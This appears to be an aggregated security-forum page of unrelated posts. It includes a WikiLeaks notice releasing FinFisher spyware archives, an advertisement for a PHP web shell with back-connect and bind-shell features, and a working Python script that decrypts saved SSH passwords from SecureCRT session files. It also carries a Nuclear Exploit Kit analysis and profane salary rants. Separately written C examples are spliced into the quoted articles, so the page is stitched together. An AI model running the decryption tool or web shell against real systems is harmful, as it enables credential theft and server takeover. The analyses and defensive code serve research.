Beginner. [SPANISH] A book on Python programming in tutorial form, suitable for all levels of learning, from novices to experts who want to know more about Python.

Sursa: PythonBooks - Learn Python the easy way !
-
-
-
SpyFiles 4 Release

Today, 15 September 2014, WikiLeaks releases previously unseen copies of weaponised German surveillance malware used by intelligence agencies around the world to spy on journalists, political dissidents and others.

FinFisher (formerly part of the UK based Gamma Group International until late 2013) is a German company that produces and sells computer intrusion systems, software exploits and remote monitoring systems that are capable of intercepting communications and data from OS X, Windows and Linux computers as well as Android, iOS, BlackBerry, Symbian and Windows Mobile devices. FinFisher first came to public attention in December 2011 when WikiLeaks published documents detailing their products and business in the first SpyFiles release.

Since the first SpyFiles release, researchers have published reports that identified the presence of FinFisher products in countries around the world and documented its use against journalists, activists and political dissidents.

Julian Assange, WikiLeaks Editor in Chief said: "FinFisher continues to operate brazenly from Germany selling weaponised surveillance malware to some of the most abusive regimes in the world. The Merkel government pretends to be concerned about privacy, but its actions speak otherwise. Why does the Merkel government continue to protect FinFisher? This full data release will help the technical community build tools to protect people from FinFisher including by tracking down its command and control centers."

FinFisher Relay and FinSpy Proxy are the components of the FinFisher suite responsible for collecting the data acquired from the infected victims and delivering it to their controllers. They are commonly deployed by FinFisher's customers at strategic points around the world to route the collected data through an anonymizing chain, in order to disguise the identity of the operators and the real location of the final storage, which is instead operated by the FinSpy Master.

File Name                     Product Name           MD5                               File Size
ffrelay-debian-4.30.ggi.zip   FinFisher Relay v4.30  180caf23dd71383921e368128fb6db52  224K
finspy_proxy.zip              FinSpy Proxy v2.10     3dfdac1304eeaaaff57cc11317768511  320K
finspy_master.zip             FinSpy Master v2.10    03d93c49a536d149206f5524d87fa319  2.5M

WikiLeaks is also publishing previously unreleased copies of the FinFisher FinSpy PC spyware for Windows. This software is designed to be covertly installed on a Windows computer and silently intercept files and communications, such as Skype calls, emails, video and audio through the webcam and microphone (you can find more details on FinSpy in the first SpyFiles release). In order to prevent any accidental execution and infection, the following files have been renamed and compressed in password protected archives (the password is "infected"). They are weaponised malware, so handle carefully.

File Name        Product Name  MD5                               File Size
finfisher.1.zip  FinSpy PC     2d5c810035dc0f83036fb12e8775817a  736K
finfisher.2.zip  FinSpy PC     434b83eba7619cb706492ff019ade0d5  576K

In order to challenge the secrecy and the lack of accountability of the surveillance industry, analyzing the internals of this software could allow security and privacy researchers to develop new fingerprints and detection techniques, identify more countries currently using the FinFisher spyware and uncover human rights abuses.

In addition, in this fourth iteration of the SpyFiles collection, WikiLeaks publishes the newly indexed material from the recent FinFisher breach (for which you can find the torrent file here), including new brochures and a database of the customer support website, which provide updated details on their product line and a unique insight into the company's customer base. In order to make the data more easily accessible and consumable, all the new brochures, videos and manuals are now available organized under the related FinFisher product name. The database is represented in full, from which WikiLeaks compiled a list of customers, their eventual attribution, all the associated support tickets and acquired licenses, along with the estimated costs calculated from FinFisher's price list. WikiLeaks conservatively estimates FinFisher's revenue from these sales to amount to around €50,000,000. Within the full list of customers, it's worth noticing that among the largest is Mongolia, which has recently been selected as new Chair of the Freedom Online Coalition.

Together with the previous releases, the SpyFiles collection represents a unique and central resource in which to find extensive and exclusive documentation about the global surveillance industry, also indexed and searchable through the WikiLeaks Search.

Source: https://wikileaks.org/spyfiles4/index.html
-
ANAF has launched an online platform through which individuals can find out information about their tax situation. How the "Private Virtual Space" works

On Monday ANAF launched, on its own website, an online platform through which natural persons can request, after registering and authenticating with a username and password, information such as the status of their payment obligations, the level of social security contributions (CAS) declared by their employer and the tax assessment decision, with the answer also delivered electronically.

The platform, named "Spațiul virtual privat" (Private Virtual Space), is for now dedicated to natural persons, as part of a pilot project for Bucharest and Ilfov, and the data can be consulted 24 hours a day.

"In 2015 we intend to extend the project to the whole country, and after we extend it other information will be added to the Private Virtual Space, such as tax assessment decisions for advance payments and for other accessory charges, payment notices and enforcement orders. Also in 2015 we want to extend the program to legal persons, who will be able to log in with a username and password," said the Minister of Public Finance, Maria Ioana Petrescu, on Monday at the launch of the platform, which Prime Minister Victor Ponta also attended.

She pointed out that at present companies can check their tax situation only if they hold a digital signature certificate, which is obtained for a fee.

The budget for this pilot program, on which a joint ANAF and MFP team worked, was zero, according to the minister, but extending it nationally requires a server infrastructure. "We are in discussions with the World Bank so that the servers it is to deliver for the modernization of ANAF arrive in time for this program," Petrescu specified.

Natural persons can submit requests online after authenticating to the system, and the answers are received within the application, in a messages section, with the requested documents attached. The payment obligations sent by ANAF are valid as of the last day of the month preceding the query, and tax assessment decisions can be received if they were issued after the date the system was put into operation.

No tax assessment decisions are issued for employees whose income comes only from individual employment contracts, so for registration in the virtual space their identification must be done directly at the ANAF counter.

At the same time, ANAF will make the "Buletinul informativ fiscal" (Tax Newsletter) service available to taxpayers, including during the pilot project period; it will include public tax information such as the calendar of tax obligations, legislative news, tax guides, ongoing campaigns and press releases.

Source: ANAF has launched an online platform through which individuals can find out information about their tax situation. How the "Private Virtual Space" works - Mediafax
-
How to start blogging with Microsoft Word
Alex Castle, Sep 15, 2014 3:30 AM

Blogging with Microsoft Word lets you use the richly featured word processor to circumvent many of the underpowered, sometimes unfriendly aspects of browser-based interfaces used by platforms like WordPress or Blogger. We'll show you several ways to write and publish blog posts directly from Word, using the tools and shortcuts you already know. While this tutorial is written for Word 2013, the necessary features are available in all versions starting from Word 2007.

WordPress

WordPress is a super-popular, open-source blogging platform that's designed to be flexible, customizable and user-friendly. WordPress is also very easy to use with Microsoft Word. If you haven't already set up a WordPress blog, you can do it in just a few minutes. Just visit WordPress.com, pick a URL that's not taken yet, and fill in some basic personal info. WordPress will try to upsell you to the $25-per-year hosting, but if you decline you'll still have unlimited free hosting and a "[something].wordpress.com" domain name. You'll be asked to pick a theme for your site, connect a social media account, and write an introductory post. You can skip the latter two steps and go back to change any of this stuff at a later time.

Creating a WordPress blog is easy and intuitive on WordPress.com. Setting up a WordPress blog on your own web server isn't much harder, but takes a little more time.

You can also download and install WordPress on almost any web host. Many hosts have scripts that handle the setup for you, but you can always visit WordPress.org to download a copy of the software. (Note that the .org website is dedicated to the WordPress software itself, while the .com website is the hosted service.) After a quick confirmation of your email address, you're ready to begin writing your first blog post. Open up Word and click File > New. From the templates menu, choose Blog Post and click Create.
Crafting blog posts in Word provides a familiar interface and set of tools. Not all of Word's functionality is available, though.

Click the button at the top left of the window marked Manage Accounts. In the dialog that pops up, you can add any number of accounts and choose which one to publish to. Click New Account and choose WordPress from the dropdown menu. You'll be asked for your blog's URL (enter it without the "www."), account name, and password. Once you've done that, just use the formatting tools in Word to write as you normally would. When you're done, click the Publish button in the top left. Your post will be uploaded to your WordPress blog.

When viewed in a browser, WordPress posts crafted in Word will look as you expect them to. Spacing and colors are subject to the theme you choose for your blog, however.

If you'd like to upload it but not make it public yet, click on the arrow under Publish and choose Publish as Draft. You'll be able to find the post in your WordPress posts list, and you can publish it whenever you want.

Blogger

Another popular blogging platform is Google's Blogger. Google account integration is obviously one of its advantages over WordPress, but Microsoft Word's integration with the service isn't quite as polished. Word can't upload images directly to Blogger, for instance; you'll have to go into the Blogger CMS (content management system) and add them manually. To get started, go to Blogger and log in with a Google account. The default setting is to link your Blogger blog to your Google+ account, but you could also choose to log in with a limited Blogger account. You'll still log in with your Google account, but you can pick a new user name for the Blogger profile, and the two won't be publicly linked.

Creating a new Blogger blog is very simple, especially for the Google faithful.

Next, you'll see the Blogger dashboard, which shows you a (still empty) list of blogs you own. Click the "New Blog" button.
Like WordPress, you choose a domain name as well as a theme for your site. Click “Create Blog,” and you’re ready to post. Back in Word, you can post to Blogger the same way as in the WordPress section above—just click File > New > Blog post and add your Blogger account information in the account manager. Because you can’t automatically upload images to Blogger using this method, your posts will have to be text-only. Still, you can use Word’s text-formatting options, such as headers, bold and italics and text alignment, and that will carry over to your blog post intact. Using other platforms Although WordPress and Blogger are better suited to fledgling bloggers, a few other blog platforms work with Microsoft Word’s publishing capability, including TypePad, and Microsoft’s own SharePoint. Here’s the trick you can use with alternative blogging platforms. Normally, if you copy and paste text from Word into a browser-based editor, the post will be utterly, irrevocably messed up by Word's usually-invisible formatting data, which turns into gibberish when you copy it into a different editor. Copying the Word text into a plaintext editor like Notepad strips out all the formatting data. Next, copy the text from Notepad into the target editor (like a web form). This will keep your post from breaking, but it strips out all the formatting, which kind of defeats the purpose of using Word in the first place. Converting your Word document to Google Docs format will strip out the parts of the Word document that don't translate well to a copy-and-paste. You can strip out the junk data without removing the formatting by using Google Drive. Just save your draft as a .doc or .docx file, then upload that to your Google Drive. Open the file using Google’s web-based word processor, Docs. The processor will automatically convert the word file into blog-friendly HTML, and you can copy-paste the whole post from the Google editor to your blog platform of choice, keeping all your formatting. 
This trick won't work for all browser editors, and you might have to make a few corrective tweaks. Still, it's a lot easier than reformatting a long post from scratch.

Source: How to start blogging using Microsoft Word with WordPress or Blogger
-
CCCP Shell

CCCPShell is a PHP shell written from scratch in my spare time.

You will find in this shell:
- Pure JavaScript (sessionStorage, serialize, ajax, append, remove, empty, change sort table order and modal dialogs)
- PHP zip with PHP code
- Full DB explorer (mysql, mssql, pgsql, oracle, sqlite, sqlite3, odbc and pdo)
- 21 icons for use in 94 file types
- CSS3
- Easy to translate to another language via the tText function (WIP)
- All the standard shell stuff
- Encrypted communication (first PHP shell in the world???)

All tools

Filemanager
[+] Copy/paste (recursive)
[+] In memory compress and download (recursive)
[+] Delete (recursive)
[+] Create file/folder
[+] Fast view folder size/count objects
[+] Fast file rename
[+] Fast chmod
[+] Fast change filedate
[!] View file information
    [+] Full path
    [+] Size
    [+] MD5
    [+] Chmod/Chown
    [+] Create time
    [+] Access time
    [+] Modify time
    [+] Hexdump preview/full
    [+] Highlight code
    [+] File content
[!] Edit
    [+] Change filetime
    [+] File name
    [+] Change content

Procs
[+] Process viewer/info
[+] Process killer

SQL
[+] Database explorer
[+] Execute SQL code

Info
[+] Server info
[+] PHP info
[+] Custom functions check

External Connect
[+] Back connect
[+] Bind shell

Execute
[+] Eval PHP code
[+] Execute (exec, shell_exec, system, passthru, popen and proc_open)

Self remove

WARNING: This shell uses the atob and btoa JavaScript functions. Check whether your browser supports them: https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64.atob

Source: https://github.com/xchwarze/CCCPShell
Via: TrojanForge
-
For a new project involving desktop application development on Mac and Windows, our client is looking for a C++ Programmer with experience in the Qt framework, who will be part of a team of 5 people. The position is open both in Bucharest and at the Iași office. Anyone interested, send me a PM.
-
I am sending you more information about the Embedded Software Developer opportunity for the Bucharest location, for one of our projects operating in the automotive field. PM if you are interested.
-
Isn't this the guy who said he earns 140 million a month? Is he by any chance in Amsterdam doing shady stuff?
-
Give us more details. What exactly do you do there? What languages do you know? Which language do you work in the most? Who gave you 40 million initially? Who gives you 140 million? Are we talking about Romania? How old are you? How many years of experience do you have? Do you have connections in the public sector? Is that what you receive in hand, i.e. net salary?
-
Super cool! I earned $10 in just 2 weeks! BRB, I'm buying TWO packs of cigarettes!
-
Hey. Who the fuck do you think is going to throw money at you? FUCK OFF! You haven't written 200 lines of code in your lives and you expect a salary of 50 million. Idiots. At the start nobody will give you more than 1500-2000 regardless of the language. Especially when you show up with a CV that says: "Oh, I know 42 programming languages" and nothing else. Projects you've worked on? Fuck all.

They are all profitable. In any language you can earn up to 2000-2500 euros a month. But that is when you become Team Leader, Manager or hold some other leadership position. In the meantime, you start at 1500 RON (you don't even deserve that) and grow gradually. Let's put it this way: 1500 RON for about 6 months to 1 year. Then you get to 20-something million, then 30 million. And after at least 2 years of experience, have the decency to ask for more than that. You can grow faster too; it depends on the company you end up at and how good you are. Stop going by what others say about earning 80 million a month. It can be earned, but after many years of work. That guy maybe worked 5 years to get to that salary; you spent 5 years jerking off, did nothing, and go to interviews wondering why they show you the door when you discuss salary.

As for the programming language, the choice is simple: pick what you like. You will always be good at what you like doing. Just as you're good at playing shitty games, you will be good at C++ if you like it. But before you even think about getting hired, write your CV and imagine you own a company and a kid with that CV shows up and you discuss salary. That's how you will realize what you are worth.

Note: If you are olympiad winners or good at something, you can earn more from the start. Let's say you get 40 million a month from the start. But that comes bundled with other drawbacks:
1. You will NOT see a raise
2. You are NOT allowed to leave that company for 2 years
It's just one case, more or less real.

If a company offers you a big salary, be sure something is off and read the contract before signing it.

@2time - What was your first salary?
@gogusan - Did they give you that much as a first salary on Java?

We're talking about the first salary here. Stop coming here with numbers like that, giving kids illusions.

Note: A relative of mine earns 1500 RON a month as a cleaning lady.

Programming is no longer what it was a few years ago. There are THOUSANDS of people, man, THOUSANDS who graduate from a relevant faculty (if you didn't go to the University or the Polytechnic in Bucharest, nobody looks at your Spiru Haret CV). To be fair, most of them are pieces of shit who learn nothing and just expect billions because they finished some shitty faculty. But for the employer what matters is that one of these shits comes along and asks for 3 million a month less.

So:
1. Work on projects. Drop the jerking off, the TV series and the games. Work! Build yourself a CV so you have something to show the guy when you say you want a pile of money from him.
2. Go to a good university. Not fucking Spiru Haret or whatever. It matters more than you think.
3. Learn! At university or at home, learn, because technical questions are asked at interviews, interviews that last even 3-4 hours.

Stop going by all the idiots posting here who are 15 and live off their parents' money.
-
Decrypt SSHv2 passwords stored in VanDyke SecureCRT

#!/usr/bin/env python3
#
# Decrypt SSHv2 passwords stored in VanDyke SecureCRT session files
# Can be found on Windows in:
#     %APPDATA%\VanDyke\Config\Sessions\sessionname.ini
# Tested with version 7.2.6 (build 606) for Windows
# Eloi Vanderbeken - Synacktiv
#
# Python 3 port; needs pycryptodome (pip install pycryptodome) for Crypto.Cipher.

import argparse
import re

from Crypto.Cipher import Blowfish

# Two fixed Blowfish keys hard-coded in SecureCRT. The stored value is encrypted
# twice in CBC mode with an all-zero IV, with 4 bytes of filler at each end.
KEY1 = bytes.fromhex('5FB045A29417D916C6C6A2FF064182B7')
KEY2 = bytes.fromhex('24A63DDE5BD3B3829C7E06F40816AA07')
ZERO_IV = b'\x00' * 8


def decrypt(password_hex):
    """Turn the hex blob following S:"Password"=u into the clear-text password."""
    c1 = Blowfish.new(KEY1, Blowfish.MODE_CBC, iv=ZERO_IV)
    c2 = Blowfish.new(KEY2, Blowfish.MODE_CBC, iv=ZERO_IV)
    padded = c1.decrypt(c2.decrypt(bytes.fromhex(password_hex))[4:-4])
    # The plaintext is UTF-16LE terminated by a 16-bit NUL; stop there, and also
    # at the end of the buffer so a malformed blob cannot loop forever.
    out = b''
    while len(padded) >= 2 and padded[:2] != b'\x00\x00':
        out += padded[:2]
        padded = padded[2:]
    return out.decode('utf-16-le')


# Keys as they appear in the .ini session file (S: = string, D: = dword in hex)
REGEX_HOSTNAME = re.compile(r'S:"Hostname"=([^\r\n]*)')
REGEX_PASSWORD = re.compile(r'S:"Password"=u([0-9a-f]+)')
REGEX_PORT = re.compile(r'D:"\[SSH2\] Port"=([0-9a-f]{8})')
REGEX_USERNAME = re.compile(r'S:"Username"=([^\r\n]*)')


def hostname(x):
    m = REGEX_HOSTNAME.search(x)
    return m.group(1) if m else '???'


def password(x):
    m = REGEX_PASSWORD.search(x)
    return decrypt(m.group(1)) if m else '???'


def port(x):
    m = REGEX_PORT.search(x)
    return '-p %d ' % int(m.group(1), 16) if m else ''


def username(x):
    m = REGEX_USERNAME.search(x)
    return m.group(1) + '@' if m else ''


parser = argparse.ArgumentParser(
    description='Tool to decrypt SSHv2 passwords in VanDyke SecureCRT session files')
parser.add_argument('files', type=argparse.FileType('rb'), nargs='+', help='session file(s)')
args = parser.parse_args()

for f in args.files:
    # Session files may be UTF-16 encoded; dropping the NUL bytes leaves plain text
    c = f.read().decode('latin-1').replace('\x00', '')
    print(f.name)
    print('ssh %s%s%s # %s' % (port(c), username(c), hostname(c), password(c)))
-
Ardamax Keylogger 4.2 Professional Edition DC 02.09.2014
Nytro replied to old66's topic in Programe hacking
Use it from a virtual machine. And it IS a keylogger.
Zeroing buffers is insufficient

On Thursday I wrote about the problem of zeroing buffers in an attempt to ensure that sensitive data (e.g., cryptographic keys) which is no longer wanted will not be left behind. I thought I had found a method which was guaranteed to work even with the most vexatiously optimizing C99 compiler, but it turns out that even that method wasn't guaranteed to work. That said, with a combination of tricks, it is certainly possible to make most optimizing compilers zero buffers, simply because they're not smart enough to figure out that they're not required to do so; and some day, when C11 compilers become widespread, the memset_s function will make this easy. There's just one catch: We've been solving the wrong problem.

With a bit of care and a cooperative compiler, we can zero a buffer, but that's not what we need. What we need to do is zero every location where sensitive data might be stored. Remember, the whole reason we had sensitive information in memory in the first place was so that we could use it; and that usage almost certainly resulted in sensitive data being copied onto the stack and into registers.

Now, some parts of the stack are easy to zero (assuming a cooperative compiler): The parts which contain objects which we have declared explicitly. Sensitive data may be stored in other places on the stack, however: Compilers are free to make copies of data, rearranging it for faster access. One of the worst culprits in this regard is GCC: Because its register allocator does not apply any backpressure to the common subexpression elimination routines, GCC can decide to load values from memory into "registers", only to end up spilling those values onto the stack when it discovers that it does not have enough physical registers (this is one of the reasons why gcc -O3 sometimes produces slower code than gcc -O2).

Even without register allocation bugs, however, all compilers will store temporary values on the stack from time to time, and there is no legal way to sanitize these from within C. (I know that at least one developer, when confronted by this problem, decided to sanitize his stack by zeroing until he triggered a page fault; but that is an extreme solution, and is both non-portable and very clearly C "undefined behaviour".)

One might expect that the situation with sensitive data left behind in registers is less problematic, since registers are liable to be reused more quickly; but in fact this can be even worse. Consider the "XMM" registers on the x86 architecture: They will only be used by the SSE family of instructions, which is not widely used in most applications, so once a value is stored in one of those registers, it may remain there for a long time. One of the rare instances those registers are used by cryptographic code, however, is for AES computations, using the "AESNI" instruction set.

It gets worse. Nearly every AES implementation using AESNI will leave two values in registers: The final block of output, and the final round key. For encryption operations these aren't catastrophic things to leak: the final block of output is ciphertext, and the final AES round key, while theoretically dangerous, is not enough on its own to permit an attack on AES. But the situation is very different for decryption operations: The final block of output is plaintext, and the final round key used is the AES key itself (or the first 128 bits of the key for AES-192 and AES-256). I am absolutely certain that there is software out there which inadvertently keeps an AES key sitting in an XMM register long after it has been wiped from memory.

As with "anonymous" temporary space allocated on the stack, there is no way to sanitize the complete CPU register set from within portable C code, which should probably come as no surprise, since C, being designed to be a portable language, is deliberately agnostic about the registers and even the instruction set of the target machine.

Let me say that again: It is impossible to safely implement any cryptosystem providing forward secrecy in C.

If compiler authors care about security, we need a new C language extension. After discussions with developers (of both cryptographic code and compilers) over the past couple of years I propose that a function attribute be added with the following meaning: "This function handles sensitive information, and the compiler must ensure that upon return all system state which has been used implicitly by the function has been sanitized." While I am not a compiler developer, I don't think this is an entirely unreasonable feature request: Ensuring that registers are sanitized can be done via existing support for calling conventions by declaring that every register is callee-save, and sanitizing the stack should be easy given that the compiler knows precisely how much space it has allocated.

With such a feature added to the C language, it will finally be possible, in combination with memset_s from C11, to write code which obtains cryptographic keys, uses them without leaking them into other parts of the system state, and then wipes them from memory so that a future system compromise can't reveal the keys. People talk a lot about forward secrecy; it's time to do something about it. But until we get that language extension, all we can do is hope that we're lucky and our leaked state gets overwritten before it's too late. That, and perhaps avoid using AESNI instructions for AES-128 decryptions.

Source: Zeroing buffers is insufficient
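To make the first half of the argument concrete, here is an added example (written for this page, not code from the post or from any library) of the "cooperative compiler" wipe the post refers to: a zeroing routine written so that dead-store elimination cannot remove it, plus a read-back check. The 16-byte "key schedule" is a constructed LCG stand-in, not AES, and the input message is constructed too. Note what the check proves and what it does not: the named buffer is clean afterwards, but the LCG state and any copy of the key the compiler kept in registers or spilled to the stack are exactly the residue the rest of the post is about, and nothing here touches them.

```c
/*
 * Added example: wiping a named buffer so the optimizer cannot drop the stores.
 * Not taken from the post; the "key schedule" below is a constructed LCG stand-in.
 */
#define __STDC_WANT_LIB_EXT1__ 1   /* ask for memset_s where the libc has Annex K */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Zero n bytes at p in a way the compiler cannot elide.
 *  - memset_s (C11 Annex K) may not be optimized away by the implementation.
 *  - Otherwise, store through a volatile pointer so each write is a side effect,
 *    then an asm statement with a "memory" clobber makes GCC/Clang assume the
 *    zeroed bytes may be read afterwards. (explicit_bzero on glibc/BSD and
 *    SecureZeroMemory on Windows are the platform equivalents.)
 */
void secure_zero(void *p, size_t n)
{
#ifdef __STDC_LIB_EXT1__
    memset_s(p, n, 0, n);
#else
    volatile unsigned char *vp = (volatile unsigned char *)p;
    while (n--)
        *vp++ = 0;
#if defined(__GNUC__) || defined(__clang__)
    __asm__ __volatile__("" : : "r"(p) : "memory");
#endif
#endif
}

/* Returns 1 if every byte of buf is zero; runs in time independent of content. */
int is_all_zero(const unsigned char *buf, size_t n)
{
    unsigned char acc = 0;
    for (size_t i = 0; i < n; i++)
        acc |= buf[i];
    return acc == 0;
}

/* Fill a buffer with non-zero bytes, wipe it, report whether it reads back as zero. */
int secure_zero_selftest(void)
{
    unsigned char buf[32];
    for (size_t i = 0; i < sizeof buf; i++)
        buf[i] = (unsigned char)(i + 1);
    if (is_all_zero(buf, sizeof buf))
        return 0;
    secure_zero(buf, sizeof buf);
    return is_all_zero(buf, sizeof buf);
}

/*
 * Derive a 16-byte key from seed (constructed LCG, not a real KDF), XOR it over
 * msg into out, then wipe the key before returning. Returns 1 if the wipe is
 * visible when the buffer is read back.
 *
 * A plain memset(key, 0, sizeof key) with nothing reading key afterwards is the
 * classic dead store the optimizer may delete; secure_zero is written so it
 * cannot be. Not handled: the LCG state x and any register/stack copies of key[].
 */
int xor_with_derived_key(const unsigned char *msg, unsigned char *out,
                         size_t n, uint32_t seed)
{
    unsigned char key[16];
    uint32_t x = seed;

    for (size_t i = 0; i < sizeof key; i++) {
        x = x * 1664525u + 1013904223u;
        key[i] = (unsigned char)(x >> 24);
    }
    for (size_t i = 0; i < n; i++)
        out[i] = msg[i] ^ key[i % sizeof key];

    secure_zero(key, sizeof key);
    return is_all_zero(key, sizeof key);
}

/* Masking twice with the same seed restores the input, and both calls must
 * report a clean key buffer. Returns 1 on success. */
int wipe_roundtrip_ok(void)
{
    static const unsigned char msg[] = "attack at dawn";   /* constructed input */
    unsigned char masked[sizeof msg], back[sizeof msg];

    int wiped1 = xor_with_derived_key(msg, masked, sizeof msg, 0x12345678u);
    int wiped2 = xor_with_derived_key(masked, back, sizeof msg, 0x12345678u);

    return wiped1 && wiped2
        && memcmp(back, msg, sizeof msg) == 0
        && memcmp(masked, msg, sizeof msg) != 0;
}

int main(void)
{
    int ok = secure_zero_selftest() && wipe_roundtrip_ok();
    printf("secure_zero self-test: %s\n", ok ? "ok" : "FAILED");
    return ok ? 0 : 1;
}
```

Build with -O2 or -O3 and compare the disassembly of xor_with_derived_key against a version that calls memset instead of secure_zero: the memset variant is where the stores tend to disappear, while the volatile loop survives. Either way the wipe covers only key[]; the spilled temporaries and XMM residue the post describes need the compiler support it asks for.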
-
JSpwn - JavaScript Static Code Analysis

Copyright:
Duarte Monteiro (etraud123) - JSPwn
Nishant Das Patnaik (nishant.dp@) - JsPrime
Paul Theriault (pauljt) - Scanjs

JSPwn is a modified version of Scanjs + JSPrime. This tool allows developers to detect sinks and sources in their applications and find XSS vulnerabilities and DOM XSS (beta). With the ScanJS engine to detect vulnerabilities and the code-flow feature of JSPrime, this app can both detect the vulnerable points and backtrack the code.

Example
1. Open the app: node server.js
2. Go to: http://localhost:4000/client/#/scan
3. Select a file from the folder
4. Enable REGEXP Custom

Link: https://github.com/Etraud123/JSpwn
-
[h=3]Nuclear Exploit Kit and Flash CVE-2014-0515[/h] For this blog, we'd like to walk you through a recent attack involving Nuclear Exploit Kit (EK) that we analyzed. It was found leveraging CVE-2014-0515, a buffer overflow in Adobe Flash Player discovered in April 2014. Nuclear Exploit kit targets a number of known vulnerabilities including: pdf - PDF:Exploit.PDF-JS swf - CVE-2014-0515 jar - CVE-2012-0507 Below are the files which were downloaded during the exploitation attempts observed: [TABLE] [TR] [TD]FILE TYPE[/TD] [TD]MD5[/TD] [TD]SIZE[/TD] [TD]CVE/THREAT[/TD] [TD]VT HITS[/TD] [/TR] [TR] [TD]FLASH[/TD] [TD]A1465ECE32FA3106AA88FD666EBF8C78[/TD] [TD=align: right]5614[/TD] [TD]CVE-2014-0515[/TD] [TD]18 / 53[/TD] [/TR] [TR] [TD]JAR[/TD] [TD]A93F603A95282B80D8AFD3F23C4D4889[/TD] [TD=align: right]12396[/TD] [TD]CVE-2012-0507[/TD] [TD]26 / 54[/TD] [/TR] [TR] [TD]PDF[/TD] [TD]19ED55EF17A49451D8052D0B51C66239[/TD] [TD=align: right]9770[/TD] [TD]Exploit.PDF-JS[/TD] [TD]22 / 54[/TD] [/TR] [TR] [TD]EXE[/TD] [TD]8BCE8A59F9E789BEFB9D178C9A03FB66[/TD] [TD=align: right]104960[/TD] [TD]Win32/Zemot[/TD] [TD]39 / 53[/TD] [/TR] [/TABLE] Although there are other associated vulnerabilities that are being exploited by Nuclear Exploit kit, we will limit this blog post to reviewing the Flash exploitation (CVE-2014-0515). Nuclear EK Landing Unlike other EKs such as RIG, Nuclear EK's landing page code is highly obfuscated. (Fig 1: Obfuscated Landing Page) After de-obfuscation, the page looks as follows: (Fig 2: De-Obfuscated Landing Page) Nuclear EK's landing page checks for the following antivirus (AV) driver files and if finds any, terminates the exploitation process. We have seen these checks before in RIG EK too. (Fig 3: Check for AV driver files) If this AV check is passed, a javascript function then checks the installed Flash version and if a vulnerable version is detected on the client's browser, a call is then made to a dynamic Flash object creation module. 
(Fig 4: Flash Call) Here are the vulnerable Flash player checks: (Fig 5: Checks if vulnerable version installed) If the version check passes, the Flash exploitation process will commence as seen below. CVE-2014-0515 exploit analysis Here is the code that dynamically creates a new Flash Object: (Fig 6: Flash Object Creation) The Flash exploit payload that gets downloaded is highly obfuscated to evade AV detection. Below is a snippet of decompiled code from this Flash exploit: (Fig 7: Decompiled Flash File) There are two hard coded snippets of obfuscated shellcode in the action script as seen below: (Fig x1,x2: Raw Shellcodes) After de-obfuscating on the run time, it adds bytecode to a Shader Object from one of the de-obfuscated shell code snippets. (Fig 8: Shader Byte Code Filler) The Shader's Pixel Bender is where this malformed byte code is written, which triggers the vulnerability. Here is the Malformed byte code: (Fig 9: Malformed data for Pixel Shader) Disassembling Pixel Bender's byte code We used Tinc Uro's program to get the PixelBender binary data decompiled. (Fig 10: Decompiled PixelBender data) We can see the inappropriate content here. The Shader Object takes a float parameter whose default value is set to a matrix of 4x4 floats and the second float value of this matrix is invalid value triggering the vulnerability. Conclusion Since the downfall of the popular Blackhole Exploit Kit, we have seen the advent of many new Exploit Kits. Nuclear Exploit Kit definitely ranks in the Top 5 prevalent EKs in the wild at the moment. We have seen an increasing number of compromised sites and scam pages leading to Nuclear Exploit Kit in past three months. Some of the notable compromised sites during this time frame that were redirecting to Nuclear EK includes: SocialBlade.com - A youtube statistics tracking site. 
AskMen.com - Men's entertainment website
Facebook.com survey scam pages

Exploit kits generally make use of known vulnerabilities, and Flash is a popular target. CVE-2014-0515 in particular affects Flash Player versions before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux. It's critical to ensure that your employees aren't running outdated versions of Flash, as it is commonly targeted by EKs.

References:
Adobe ActionScript® 3 (AS3) API Reference
http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf
kaourantin.net: Pixel Bender .pbj files
JPEXS Free Flash Decompiler - Download
Malware-Traffic-Analysis.net

- Rubin Azad

Source: Zscaler Research: Nuclear Exploit Kit and Flash CVE-2014-0515
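The affected-version ranges quoted above are easy to get wrong in an inventory script, because the patched 11.7.700.279+ builds sort below 13.0.0.206. The following is an added example (not code from the Zscaler post) that applies the ranges separately; the host names and version strings in main() are constructed sample data.

```c
/* Added example, not from the Zscaler post: checks an installed Flash Player
 * version string against the CVE-2014-0515 affected ranges quoted above. The
 * fixed 11.7.700.279+ builds sort below 13.0.0.206, so a single "older than
 * 13.0.0.206" test would wrongly flag them; each range is applied on its own. */
#include <stdio.h>

typedef struct { int v[4]; } FlashVersion;
enum FlashPlatform { FLASH_WINDOWS_OSX, FLASH_LINUX };

/* Parse "a.b.c.d"; at least "a.b" is required, missing parts read as 0. */
int flash_parse_version(const char *s, FlashVersion *out) {
    out->v[0] = out->v[1] = out->v[2] = out->v[3] = 0;
    return sscanf(s, "%d.%d.%d.%d", &out->v[0], &out->v[1],
                  &out->v[2], &out->v[3]) >= 2;
}

/* Lexicographic compare of a parsed version with a literal b0.b1.b2.b3. */
static int flash_cmp(const FlashVersion *a, int b0, int b1, int b2, int b3) {
    const int b[4] = { b0, b1, b2, b3 };
    for (int i = 0; i < 4; i++)
        if (a->v[i] != b[i]) return a->v[i] < b[i] ? -1 : 1;
    return 0;
}

/* 1 = affected by CVE-2014-0515, 0 = not affected, -1 = unparseable
 * (report for manual review rather than treating it as safe). */
int flash_vulnerable_cve_2014_0515(const char *version, enum FlashPlatform plat) {
    FlashVersion fv;
    if (!flash_parse_version(version, &fv)) return -1;
    if (plat == FLASH_LINUX)
        return flash_cmp(&fv, 11, 2, 202, 356) < 0;
    /* Windows and OS X: everything before 11.7.700.279 ... */
    if (flash_cmp(&fv, 11, 7, 700, 279) < 0) return 1;
    /* ... plus 11.8.x through 13.0.x before 13.0.0.206. */
    return flash_cmp(&fv, 11, 8, 0, 0) >= 0 && flash_cmp(&fv, 13, 0, 0, 206) < 0;
}

int main(void) {
    /* Constructed inventory lines, not data from the post. */
    const char *hosts[][2] = {
        { "ws01", "11.7.700.275" }, { "ws02", "11.7.700.279" },
        { "ws03", "13.0.0.182" },   { "ws04", "13.0.0.206" },
    };
    for (size_t i = 0; i < sizeof hosts / sizeof hosts[0]; i++)
        printf("%s flash %s -> %d\n", hosts[i][0], hosts[i][1],
               flash_vulnerable_cve_2014_0515(hosts[i][1], FLASH_WINDOWS_OSX));
    return 0;
}
```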
-
Forced to Adapt: XSLCmd Backdoor Now on OS X

